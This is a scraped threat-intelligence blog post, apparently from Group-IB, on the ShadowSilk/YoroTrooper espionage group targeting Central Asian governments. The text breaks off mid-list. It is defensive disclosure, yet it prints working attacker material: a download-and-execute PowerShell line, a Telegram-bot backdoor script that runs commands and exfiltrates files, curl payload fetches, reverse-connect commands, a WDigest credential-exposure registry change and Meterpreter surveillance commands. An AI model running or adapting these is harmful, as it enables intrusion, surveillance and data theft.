{
	"id": "66631071-b450-4eb0-89f0-98f57fe9d809",
	"created_at": "2026-04-06T00:19:24.640316Z",
	"updated_at": "2026-04-10T03:25:25.339761Z",
	"deleted_at": null,
	"sha1_hash": "d9badf5186a32d32b5796f3838d4202bf3ea32ac",
	"title": "ShadowSilk: A Cross-Border Binary Union for Data Exfiltration | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 792583,
	"plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026\r\nDRP\r\nSergei Turner\r\nCyber Intelligence Analyst, APAC\r\nShadowSilk: A Cross-Border\r\nBinary Union for Data Exfiltration\r\nThis blog describes attacks on victims in Central Asia and APAC. Research into the attack has\r\nidentified a group also called YoroTrooper. We also identified profiles of attackers on hacker forums,\r\ntheir malicious web-panels, test infections of attackers' own machines, and screenshots of attackers'\r\ndesktops.\r\nAugust 27, 2025 · min to read · Threat Intelligence\r\n← Blog\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 1 of 40\n\nAsia Corporate access Dark Web forums Telegram Web-panel YoroTrooper\r\nIntroduction\r\nIn the fall of 2024, Group-IB analysts discovered a series of attacks that targeted government\r\norganizations of countries within the Central Asia and Asia-Pacific region. Group-IB’s initial\r\nassessment revealed that the attacks have been ongoing since 2023, and remains active as of July\r\n2025, based on the activity in the threat actor controlled infrastructure.\r\nThe toolset and infrastructural overlaps with previous campaigns carried out by a group known\r\npublicly as YoroTrooper. Part of this activity was discussed in January 2025 as “Silent Lynx,” which\r\nGroup‑IB tracked and internally designated as ShadowSilk. Subsequent research showed a more\r\nnuanced profile and a larger‑than‑expected campaign with many previously unknown victims,\r\nleading Group‑IB to attribute the expanded activity to a threat cluster codenamed ShadowSilk.\r\nAfter the January disclosure of their activities, ShadowSilk abandoned much of its infrastructure.\r\nHowever, in June 2025 Group‑IB observed renewed activity and new infrastructure, identified\r\nadditional government victims in Central Asia, and collected new IOCs.\r\nIn a joint operation, analysts from Group‑IB and CERT‑KG obtained a key image of the attackers’\r\nserver. Analysis uncovered multiple large‑scale attacks, detailed the group’s tactics, techniques, and\r\nprocedures (TTPs), and revealed new information about its composition, working languages,\r\ncountry of origin, and objective in every observed case: data exfiltration.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 2 of 40\n\nKey discoveries\r\nGroup-IB Threat Intelligence Portal:\r\nShadowSilk\r\nGroup-IB customers can access our Threat Intelligence portal for more information about\r\nShadowSilk.\r\nShadowSilk has been active since at least 2023, and remains active as of July 2025.\r\nThe group’s primary focus lies in targeting government organizations for the purpose of data\r\nexfiltration.\r\nOver 35 victims, primarily in the government sector of Central Asia, have been identified during\r\nthe course of Group-IB’s analysis.\r\nAnalysis reveals that the group uses infrastructure and tools historically linked to YoroTrooper.\r\nShadowSilk consists of two sub-groups and has Chinese and Russian speaking operators. The\r\nexact depth and nature of cooperation of these two sub groups remains still uncertain as of the\r\npublishing of this research.\r\nShadowSilk uses a diverse toolkit which includes public exploits, penetration-testing tools, and\r\nweb panels for managing infected devices. The panels are known to have been acquired via\r\ndarkweb forums.\r\nAt some point, a fraction of data known to be ShadowSilk’s possession appeared for sale on\r\none of the dark web forums, which had never previously appeared in public.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 3 of 40\n\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 4 of 40\n\nFigure 1. ShadowSilk’s campaign largely focuses on countries and critical industries within Asia.\r\nTracing the Attacks to YoroTrooper – And\r\nWhy It Might Be Just the Beginning\r\nDuring the course of Group-IB’s investigation into the attacks conducted by ShadowSilk, we\r\nidentified PowerShell code (below) that downloads payloads from https://tpp[.]tj/BossMaster.txt and\r\nhttps://tpp[.]tj/iap.txt.\r\npowershell -c \"(Invoke-WebRequest https://tpp.tj/BossMaster.txt | iex\" REG ADD\r\n HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsTaskPath /t\r\n REG_SZ /d 'powershell -ExecutionPolicy Bypass -command \"\r\n(iwr https://tpp.tj/iap.txt).Content | iex\"' /f /run reg query HKCU\\SOFTWARE\\Microsoft\\Win\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 5 of 40\n\nThese same URLs were previously mentioned by Cisco researchers in their report about\r\nYoroTrooper. Notably: tpp[.]tj is a compromised legitimate website of Tajikistan gov agency that has\r\nbeen compromised.\r\nIn addition, we discovered a file named /www/html/gramm.ps1 on the ShadowSilk group’s server,\r\ncontaining the following code — the same script referenced in the previously mentioned research\r\non YoroTrooper.\r\n$Token=\"{redacted}\"\r\n$URL=\"https://api.telegram.org/bot{0}\" -f $Token\r\n$lastID = {redacted}\r\nwhile ($true) {\r\n # Xabarlarni o'qish\r\n $inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates?offset=' + ($lastID\r\n $inMessage.result | ForEach-Object {\r\n $updateid = $_.update_id\r\n $from = $_.message.from.id\r\n $command = $_.message.text\r\n $OFS=''\r\n # Cmd-da buyruqlarni bajarish uchun\r\n if([string]$command[0..3] -eq \"/cmd\"){\r\n $command = [string]$command[5..$command.Length]\r\n $result = Invoke-Expression($command)\r\n $res = \"\"\r\n $result | ForEach-Object {$res += [string]$_ + \"%0D%0A\"}\r\n if($res -eq \"\"){\r\n $lastID = $updateid\r\n continue\r\n }\r\n if($res.Length -gt 4095){\r\n for ($i = 0; $i -lt $res.Length / 4095; $i++) {\r\n $begin = $i * 4095\r\n $end = $begin + 4094\r\n if($end -gt $res.Length){\r\n $end = $res.Length\r\n }\r\n $data = \"chat_id=$from\u0026text=\" + $res[$begin..$end]\r\n $URI = \"$URL/sendMessage?$data\"\r\n Invoke-WebRequest -Uri $URI \u003e $null\r\n }\r\n } else {\r\n $data = \"chat_id=$from\u0026text=$res\"\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 6 of 40\n\n$URI = \"$URL/sendMessage?$data\"\r\n Invoke-WebRequest -Uri $URI \u003e $null\r\n }\r\n \r\n }\r\n # Fayllarni yuklab olish uchun\r\n if([string]$command[0..8] -eq \"/download\"){\r\n Write-Host $command\r\n $FilePath = [string]$command[10..$command.Length]\r\n $FieldName = 'document'\r\n Write-Host $FilePath\r\n Write-Host (Split-Path -leaf $FilePath)\r\n Add-type -AssemblyName System.Net.Http\r\n $httpClientHandler = New-Object System.Net.Http.HttpClientHandler\r\n $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler\r\n $FileStream = [System.IO.FileStream]::new($FilePath, [System.IO.FileMode]::Ope\r\n $FileHeader = [System.Net.Http.Headers.ContentDispositionHeaderValue]::new('fo\r\n $FileHeader.Name = $FieldName\r\n $FileHeader.FileName = (Split-Path $FilePath -leaf)\r\n $FileContent = [System.Net.Http.StreamContent]::new($FileStream)\r\n $FileContent.Headers.ContentDisposition = $FileHeader\r\n $FileContent.Headers.ContentType = [System.Web.MimeMapping]::GetMimeMapping($F\r\n \r\n $MultipartContent = [System.Net.Http.MultipartFormDataContent]::new()\r\n $MultipartContent.Add($FileContent)\r\n \r\n $httpClient.PostAsync(\"$URL/sendDocument?chat_id=$from\", $MultipartContent) \u003e\r\n }\r\n $lastID = $updateid\r\n }\r\n Start-Sleep 2\r\n}\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 7 of 40\n\nFigure 2. The contents of the file /www/html/gramm.ps1.\r\nSource: Cisco Talos\r\nThe Russian Connection\r\nAnalysis of the attackers’ server image also showed that the attackers use the Russian keyboard\r\nlayout and sometimes make typos when entering commands,such as entering a command using the\r\nRussian layout:\r\nыскуут -ды ==\u003e screen -ls\r\n/дшые ==\u003e /list\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 8 of 40\n\nWe also observed a lot of activity that indicated that the attackers were testing malware capabilities\r\non their own devices. For example, the attackers launched a Cobalt Strike Beacon on one of their\r\ndevices:\r\n 07/24 06:11:07 UTC [metadata] [redacted] \u003c- 10.0.20.123; computer: DESKTOP-FBQVC35; user\r\n07/24 06:11:19 UTC [input] sleep 0\r\n07/24 06:11:19 UTC [task] Tasked beacon to become interactive\r\n07/24 06:11:44 UTC [checkin] host called home, sent: 16 bytes\r\n07/24 06:12:23 UTC [input] зцв\r\n07/24 06:12:23 UTC [error] Unknown command: зцв\r\n07/24 06:12:25 UTC [input] pwd\r\n07/24 06:12:25 UTC [task] \u003c\u003e Tasked beacon to print working directory\r\n07/24 06:12:25 UTC [checkin] host called home, sent: 8 bytes\r\n07/24 06:12:26 UTC [output]\r\nCurrent directory is C:\\Users\\redacted\\Desktop\\tmp\r\n07/24 06:12:27 UTC [input] cd ..\r\n07/24 06:12:27 UTC [task] \u003c\u003e cd ..\r\n07/24 06:12:27 UTC [checkin] host called home, sent: 10 bytes\r\n07/24 06:12:30 UTC [input] cd tools\r\n07/24 06:12:30 UTC [task] \u003c\u003e cd tools\r\n07/24 06:12:30 UTC [checkin] host called home, sent: 13 bytes\r\n07/24 06:12:34 UTC [input] dir\r\n07/24 06:12:34 UTC [error] Unknown command: dir\r\n07/24 06:12:36 UTC [input] ls\r\n07/24 06:12:36 UTC [task] \u003c\u003e Tasked beacon to list files in .\r\n07/24 06:12:36 UTC [checkin] host called home, sent: 19 bytes\r\n07/24 06:12:37 UTC [output]\r\nC:\\Users\\redacted\\Desktop\\tools\\*\r\nD 0 07/24/2024 10:47:22 .\r\nD 0 07/22/2024 13:34:09 ..\r\nD 0 07/22/2024 15:22:25 ADSearch\r\nD 0 09/13/2023 10:17:26 DebugAmsi\r\nD 0 09/13/2023 10:17:27 decompiler-explorer\r\nD 0 02/19/2024 16:40:52 donut\r\nD 0 04/18/2024 16:00:48 Dumpert\r\nD 0 04/18/2024 13:25:18 DuplicateDump\r\nD 0 10/30/2023 10:10:21 Exchange\r\nD 0 09/13/2023 10:17:27 FilelessRemotePE\r\nD 0 03/13/2024 11:17:41 how-does-MobaXterm-encrypt-password\r\nD 0 02/19/2024 17:36:33 il-repack\r\nF 126423 04/20/2024 11:15:34 Inveigh-net3.5-v2.0.10.zip\r\nF 303194 04/22/2024 09:13:27 Inveigh.ps1\r\nD 0 04/18/2024 12:11:06 lsa-whisperer\r\nD 0 09/13/2023 10:17:31 Met\r\nD 0 04/18/2024 13:22:24 MirrorDump\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 9 of 40\n\nD 0 07/22/2024 09:30:09 ncat-portable-5.59BETA1\r\nD 0 09/13/2023 10:17:33 Neo-reGeorg\r\nF 24938216 07/28/2023 23:23:53 ngrok.exe\r\nD 0 04/18/2024 14:52:31 operapass\r\nD 0 09/13/2023 10:17:35 pe2shellcode\r\nF 10730 07/24/2024 10:47:33 PortScan.ps1\r\nF 770279 07/22/2024 14:51:56 PowerView.ps1\r\nD 0 05/27/2024 15:14:18 resocks\r\nD 0 02/15/2024 09:51:08 ReverseSocks5\r\nF 2121159 05/28/2024 16:42:02 ReverseSocks5.rar\r\nD 0 09/13/2023 10:17:38 Seatbelt\r\nD 0 04/30/2024 11:09:12 SharpChromium\r\nD 0 04/26/2024 10:53:13 SharpDPAPI\r\nD 0 09/13/2023 10:17:43 SharpDXWebcam\r\nD 0 09/13/2023 10:17:43 SharPersist\r\nD 0 07/22/2024 13:32:38 SharpHound\r\nD 0 09/13/2023 10:17:45 SharpUp\r\nD 0 09/13/2023 10:17:48 SharpView\r\nD 0 09/13/2023 10:17:51 socat\r\nF 36 07/05/2024 09:12:49 test.php\r\nD 0 02/19/2024 10:57:19 ThreatCheck\r\nD 0 04/18/2024 11:06:41 UACME\r\nD 0 03/15/2024 13:05:08 webcam\r\nD 0 03/13/2024 11:37:33 XMCredentialsDecryptor\r\n07/24 06:13:12 UTC [input] shell powershell -F PortScan.ps1 -ComputerName localhost\r\n07/24 06:13:12 UTC [task] Tasked beacon to run: powershell -F PortScan.ps1 -ComputerName\r\n07/24 06:13:12 UTC [checkin] host called home, sent: 81 bytes\r\n07/24 06:13:13 UTC [output]\r\nreceived output:\r\nFile C:\\Users\\redacted\\Desktop\\Tools\\PortScan.ps1 cannot be loaded because running scripts\r\nFor more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?Link\r\n + CategoryInfo : SecurityError: (:) [], ParentContainsErrorRecordException\r\n + FullyQualifiedErrorId : UnauthorizedAccess\r\n07/24 06:13:24 UTC [input] shell powershell -ep bypass -F PortScan.ps1 -ComputerName loca\r\n07/24 06:13:24 UTC [task] Tasked beacon to run: powershell -ep bypass -F PortScan.ps1 -Co\r\n07/24 06:13:24 UTC [checkin] host called home, sent: 92 bytes\r\n07/24 06:13:35 UTC [output]\r\nreceived output:\r\nWARNING: No port-file to assign service with port found! Execute the script \"Create-PortLi\r\nthe latest version.. This warning doesn affect the scanning procedure.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 10 of 40\n\nWe analyzed the accounts of the attackers in Telegram groups, as well as darknet forums, and\r\nconcluded that the operators of the YoroTrooper group are fluent in Russian and use it as their\r\nnative language. Our assessment indicates that Russian-speaking YoroTrooper are engaged in the\r\ndevelopment of malware and conducting attacks to ensure initial access.\r\nChinese Comrades\r\nThe next important discovery was a set of screenshots that captured the attackers’ workstations,\r\noperators, and other revealing details.\r\nLet’s start with screenshots of the attackers’ workstations:\r\nFigure 3. A screenshot of the attackers’ workstation with an opened article about PrintNightmare\r\n(CVE-2021-34527).\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 11 of 40\n\nFigure 4. A screenshot of the attackers’ workstation showing a repository of Python implementation\r\nfor PrintNightmare, and a running Struts2VulsTools – a Chinese language vulnerability scanner.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 12 of 40\n\nFigure 5. A screenshot of the attackers’ workstation showing an open gov website of the Kyrgyz\r\nRepublic\r\nBased on the above screenshots, the environment – such as visited pages, the active keyboard\r\nlayout, and automatic translation of websites into Chinese – indicates that the device likely belongs\r\nto a Chinese-speaking operator. This discovery introduces a new Chinese-language dimension into\r\nour investigation. The data from the screenshots also allowed us to identify additional tools, as well\r\nas a connection with YoroTrooper.\r\nNew Campaign Activity Linked to Chinese-Language Operators: Jan\r\n2025 to Present\r\nSimilarly, in the recently discovered ShadowSilk’s campaign (January-June 2025), compromised\r\nmachines that contained what appears to be mail server dumps from two government entities of\r\ndifferent countries were configured with a Chinese locale:\r\n OS 名称: Microsoft Windows 10 专业版\r\nOS 版本: 10.0.19045 暂缺 Build 19045\r\nOS 制造商: Microsoft Corporation\r\nOS 配置: 独立工作站\r\nOS 构建类型: Multiprocessor Free\r\n注册的所有人: David\r\n注册的组织:\r\n产品 ID: 00331-10000-00001-AA573\r\n初始安装日期: 2023/11/1, 下午 03:52:36\r\n系统启动时间: 2025/1/15, 下午 05:19:30\r\n系统制造商: VMware, Inc.\r\n系统型号: VMware7,1\r\n系统类型: x64-based PC\r\n处理器: 安装了 1 个处理器。\r\n [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~3000 Mhz\r\nBIOS 版本: VMware, Inc. VMW71.00V.16722896.B64.2008100651, 2020/8/10\r\nThe specific machine is believed to be used for data exfiltration by the threat actors.\r\nAs mentioned earlier, following the discovery and exposure of some of the group’s infrastructure in\r\nlate January 2025, ShadowSilk abandoned a significant part of it. However, in June 2025, Group-IB\r\ndiscovered new Telegram bots attributed to ShadowSilk with high confidence. One of the bots was\r\ncreated on 30 January, one week after their previous bots were exposed.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 13 of 40\n\nThe newly discovered campaign bears procedural and operational similarities with the previously\r\nidentified ShadowSilk’s campaign.\r\nThe following is the PowerShell script from ShadowSilk’s earlier campaign that was previously\r\ndiscovered:\r\n /XXXXX cmd /c curl -o c:\\users\\public\\rev.exe hxxps://pweobmxdlboi[.com/sokcs.exe\r\nThe following is the PowerShell script from ShadowSilk’s new, and ongoing, campaign:\r\n /goXXX cmd /c curl -o C:\\users\\user\\appdata\\local\\spoolsvc.rar hxxps://sss[.]qwadx[.]com/\r\nOne of the attackers’ IP addresses that remained unchanged over the two campaigns, enabling us\r\nto link them together.\r\nThe attacker’s IP address used for the new and ongoing campaign:\r\nID XXXX:\r\nRequesting URL: hxxp://141[.]98[.]82[.]198:443/note.txt\r\nThe attackers’ IP address that was used in the previously discovered campaign:\r\nUsage of Telegram bots to communicate with infected machines;\r\nPowerShell commands sent via Telegram bots;\r\nCommands for bot-machine interaction have been slightly modified, but strong similarities\r\nremain.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 14 of 40\n\n[XXXXX]\r\nRequesting URL: http://141[.]98[.]82[.]198:8080/note.txt\r\nShadowSilk also made slight modifications to executable file names:\r\n /XXXXX C:\\users\\public\\rev.exe -connect 65[.]38[.]120[.]38:443\r\n/goXXXX C:\\users\\public\\libraries\\revv2.exe -connect 94[.]232[.]249[.]239:443\r\nBased on the creation dates of the newly discovered bots, the campaign began in late January\r\n2025, and remains active at the time of writing.\r\nCommonalities Between the Two Groups\r\nAnalysis of desktop screenshots revealed identical victims between the two subgroups. Group-IB\r\nresearchers identified a network of infections in Uzbek organizations based on data from\r\nYoroTrooper’s malware. The same victims were also found in screenshots associated with a Chinese-speaking operator, but in the context of network penetration and internal reconnaissance.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 15 of 40\n\nFigure 6. A screenshot of ShadowSilk’s reconnaissance notes with Chinese characters.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 16 of 40\n\nFigure 7. A screenshot of the attacker’s machine, displaying the Godzilla Webshell.\r\nThe most attentive readers found the username “mai”. Here, we compiled a list of file paths that we\r\nfound on the server that contain this username:\r\n C:\\Users\\mai\\Desktop\\Penetration-Tools\\WebShellTools\\Behinder_v4.0.6\\更新日志.txt\r\nC:\\Users\\mai\\Desktop\\BackupTools\\VpnNode\\0416\\节点.txt\r\nC:\\Users\\mai\\Project\\mm\\[redacted].txt\r\nC:\\Users\\mai\\Project\\mm\\[redacted].txt\r\nC:\\Users\\mai\\Project\\mm\\[redacted].txt\r\nC:\\Users\\mai\\Project\\mm\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\InnerNetwork\\Fscan\\targets.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\notes.txt\r\nC:\\Users\\mai\\Desktop\\BackupTools\\v2rayN-Core\\guiLogs\\2023-07-17.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\WebShellTools\\godzilla\\test.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\202-129.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\notes.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\pk\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Downloads\\WordPress RCE POC\\urls.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\10.190.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\192.168.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\WebShellTools\\godzilla\\zxcvb.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\10.10.10.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\ad_users.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\ad_machines.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\notes.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\mm\\notes.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\Exchange\\SharpExchangeKing.2023-07-21.v2.4.3\\owadat\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\Exchange\\SharpExchangeKing.2023-07-21.v2.4.3\\ssa_po\r\nC:\\Users\\mai\\Desktop\\test.txt\r\nC:\\Users\\mai\\Downloads\\addssp\\readme.txt\r\nC:\\Users\\mai\\Desktop\\result.txt\r\nC:\\Users\\mai\\Desktop\\encode.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\za\\[redacted].txt\r\nC:\\Users\\mai\\.3T\\log.txt\r\nC:\\Users\\mai\\.zenmap\\target_list.txt\r\nC:\\Users\\mai\\Downloads\\consullocnew-master\\consullocnew-master\\1.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\uz\\10.0.0.0.txt\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 17 of 40\n\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\Shiro\\shirokeys.txt\r\nC:\\Users\\mai\\Desktop\\Project_notes\\[redacted]\\[redacted].txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\ehole\\EHole_windows_amd64\\targets.txt\r\nC:\\Users\\mai\\Desktop\\Penetration-Tools\\URLFinder\\1.txt\r\nC:\\Users\\mai\\Downloads\\V1.0.20210322\\服务端脚本说明.txt\r\nC:\\Users\\mai\\Downloads\\V1.0.20210322\\更新说明.txt\r\nC:\\Users\\mai\\Desktop\\sms.txt\r\nAs you can see from the contents of the aforementioned files, the user “mai” uses utilities such as:\r\n WebShellTools\\godzilla\r\nWebShellTools\\Behinder_v4.0.6\r\nBackupTools\\v2rayN-Core\r\nInnerNetwork\\Fscan\r\nPenetration-Tools\\Fofa_View\\fofaviewer.jar\r\nShadowSilk’s Arsenal – Toolset and Exploits\r\nShadowSilk uses a wide range of tools and exploits, including:\r\nWhile analyzing an image of the attackers’ server, Group-IB researchers discovered a directory\r\ncalled “rat”, which contained the following directories:\r\nVulnerabilities: CVE-2018-7600, CVE-2018-7602, CVE-2024-27956\r\nWeb application attack tools: sqlmap, wpscan\r\nReconnaissance tools: FOFA, Shodan, fscan, gobuster, dirsearch\r\nIntrusion and control tools: Metasploit, Cobalt Strike, custom applications and scripts for\r\ngaining access based on Telegram bots, proxy utilities such as resocks, proxifier, chisel, rsocx.\r\nChinese utilities Antsword, Godzilla webshell, WeblogicTool, FinalShell and SNETCracker. HTTP-Reverse-Shell, Drupalgeddon2.\r\nControl panels JRAT and MORF Project for infected devices purchased on darknet platforms.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 18 of 40\n\n└─$ ll rat\r\nmorf_server\r\nweb-panel\r\nweb-panel---shell\r\nHaving analyzed these directories, we found that they contain code for web panels for managing\r\nbots (infected devices).\r\nWeb-panel—shell – Panel JLIB \\ Panel JLIB\r\nThis panel has the following login form:\r\nFigure 8. A screenshot of the login form to the JRAT control panel.\r\nAfter logging in with valid credentials, the web panel displays a list of bots from the internal\r\ndatabase, regardless of their current activity status. The screenshot shows a single infection, which\r\nappears to be a test instance used by the attackers.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 19 of 40\n\nFigure 9. A screenshot of the admin panel of JRAT.\r\nThis panel allows the attackers to upload files to the infected devices, as well as to execute\r\nmalicious code on them.\r\nWeb Panel: Morf Project\r\nThe next directory “Web-panel” contains another panel, which is different in style, but also allows\r\nattackers to execute commands and upload malicious files to infected devices.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 20 of 40\n\nFigure 10. A screenshot of the “Morf Project” login panel, found within the “Web-panel” directory.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 21 of 40\n\nFigure 11. A screenshot of the “Morf Project” web interface.\r\nMorf_server\r\nThis directory does not contain the web panel, but serves as an intermediate server between the\r\nweb panel and the infected device. It enables operators to receive connections from bots and\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 22 of 40\n\ntransmit the data to the attackers’ malware panel, thereby reducing the likelihood of this panel being\r\ndetected by researchers.\r\nFigure 12. A screenshot of the Morf_server application code.\r\nIt is noteworthy that none of the panels have the ability to create malicious files. In addition, Group-IB researchers discovered that these panels are not developed by the attackers themselves, but\r\nwere instead purchased from other users on XSS underground forum.\r\nTactics, Techniques and Procedures\r\nReconnaissance\r\nDuring the reconnaissance phase, the attackers used public tools like Shodan and FOFA to gather\r\ndata on targets of interest:\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 23 of 40\n\nshodan search \"org:.gov wordpress country:tr\"\r\nshodan search \"org:.gov country:tr\"\r\nshodan search \"org:gov country:tr\"\r\nshodan search \"hostname:gov country:tr\"\r\nshodan count \"hostname:gov country:tr\"\r\nshodan count \"hostname:gov wordpress and country:tr\"\r\nshodan count \"hostname:gov wordpress country:tr\"\r\nshodan search \"hostname:gov wordpress country:tr\"\r\nshodan search \"hostname:gov http.title:Wordpress country:tr\"\r\nshodan search 'hostname:gov http.title:\"Wordpress\" country:tr'\r\nResource Development\r\nThe attackers created and used Telegram bots as a command-and-control (C2) center, leveraging\r\nthem to issue commands, exfiltrate confidential data, update malware modules, and disguise traffic\r\nas legitimate messenger activity.\r\nThis is made possible because many of Telegram’s features—though entirely legitimate—are well\r\nsuited for command-and-control and data exfiltration tasks. For example, the Open Bot API and\r\naccess tokens allow anyone to create a bot within a minute and control it via HTTPS/MTProto. As\r\nfar as external observers are concerned, the resulting traffic appears as a regular request to\r\nTelegram.\r\nThis approach allows attackers to bypass traditional monitoring tools, and speeds up the execution\r\nof attack operations. The attackers also created the domains that were used in the attacks.\r\nInitial Access\r\nFor initial access, the attackers used phishing emails designed to lure their victims into opening a\r\npassword-protected archive, and running the executable contained within.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 24 of 40\n\nFigure 13. A screenshot of a phishing email from ShadowSilk.\r\nAs soon as the victim launches the binary, their device will be infected with malware that uses\r\nTelegram as its command-and-control channel. This allows the attackers to remotely execute\r\ncommands and receive their execution results in real-time.\r\nExecution\r\nAfter gaining access to infected hosts via Telegram malware, the attackers download and launch\r\nadditional malicious programs using the same channel.\r\n/73640 cmd /c curl -o c:\\users\\public\\music\\147.exe hxxps://document[.]hometowncity[.]clou\r\n/73640 start c:\\users\\public\\music\\147.exe\r\n/73640 cmd /c c:\\users\\public\\music\\147.exe\r\n/26450 cmd /c curl -o c:\\users\\public\\gservice.exe hxxps://document[.]webmailsession[.]com\r\n/26450 cmd /c start c:\\users\\public\\gservice.exe\r\nPersistance\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 25 of 40\n\nTo maintain persistence,\r\nthe attackers deploy additional malicious tools and modify the Windows\r\nregistry to ensure their binaries would automatically execute at system startup.\r\n/26450 REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateSoft /t REG_SZ\r\n[26450]\r\nОперация успешно завершена.[Translation:The operation was completed successfully.]\r\n/cmd REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateSoftWar /t REG_SZ\r\n[13456]\r\nОперация успешно завершена.[Translation:The operation was completed successfully.]\r\n/26450 REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinUpTask /t REG_SZ /\r\n[26450]\r\nОперация успешно завершена.[Translation:The operation was completed successfully.]\r\nPrivilege Escalation\r\nThe attackers use the utility available at hxxps://github[.]com/peass-ng/PEASS-ng to identify\r\npersistence mechanisms, saved passwords in configuration files, and explore other ways of\r\nincreasing their existing privileges.\r\nCredential Access\r\nThe attackers use a custom tool – allegedly bought on a dark web forum – that steals Chrome\r\npassword storage files, along with the decryption key located at\r\n“AppData\\Local\\Google\\Chrome\\User Data\\Local State” to decrypt these storages. In addition, the\r\nattackers use the directory listing on the victims’ devices to find files that are of interest to them. For\r\nexample, the attackers downloaded .txt and .xlsx files containing passwords from web services of\r\ntheir victims.\r\nDiscovery\r\nFor internal reconnaissance purposes, the attackers used the fscan utility.\r\nIn addition, having gained access to the victims’ devices through the Telegram malware, the\r\nattackers use the ability to execute commands such as: Dir, ipconfig, whoami, systeminfo. The\r\nattackers also used Meterpreter in their attacks and executed commands such as:\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 26 of 40\n\nexecute -H -f reg -a \"add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\r\nexecute -H -f reg -a \"add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\r\nexecute -H -f reg -a \"query HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDiges\r\nThese commands interact with the Windows Registry, specifically modifying or querying the\r\nUseLogonCredential value in the WDigest authentication settings. One of the commands enables\r\nWDigest authentication, which can be a security risk since it allows credentials to be stored in\r\nmemory in plaintext. Another command checks whether UseLogonCredential is set and returns its\r\nvalue: a value of 1 indicates WDigest is enabled, while 0 or absence of the key means it is disabled.\r\nThe threat actors also used several more features from Meterpreter session:\r\nwifi_list\r\ngetproxy\r\nCollection\r\nThe attackers use the built-in features of Cobalt Strike and Metasploit to capture screenshots as\r\nwell as webcam pictures and internal mic records:\r\nscreenshot\r\nwebcam_snap -h\r\nwebcam_snap -q 100\r\nscreenshot -q 100\r\nrecord_mic -h\r\nrecord_mic -d 12 -f 19.wav\r\nwebcam_list\r\nIt has also been observed that the attackers were using the built-in kiwi utility in a Meterpreter\r\nsession as well as some other built-in features:\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 27 of 40\n\nload kiwi\r\nkiwi_cmd\r\nkiwi_cmd 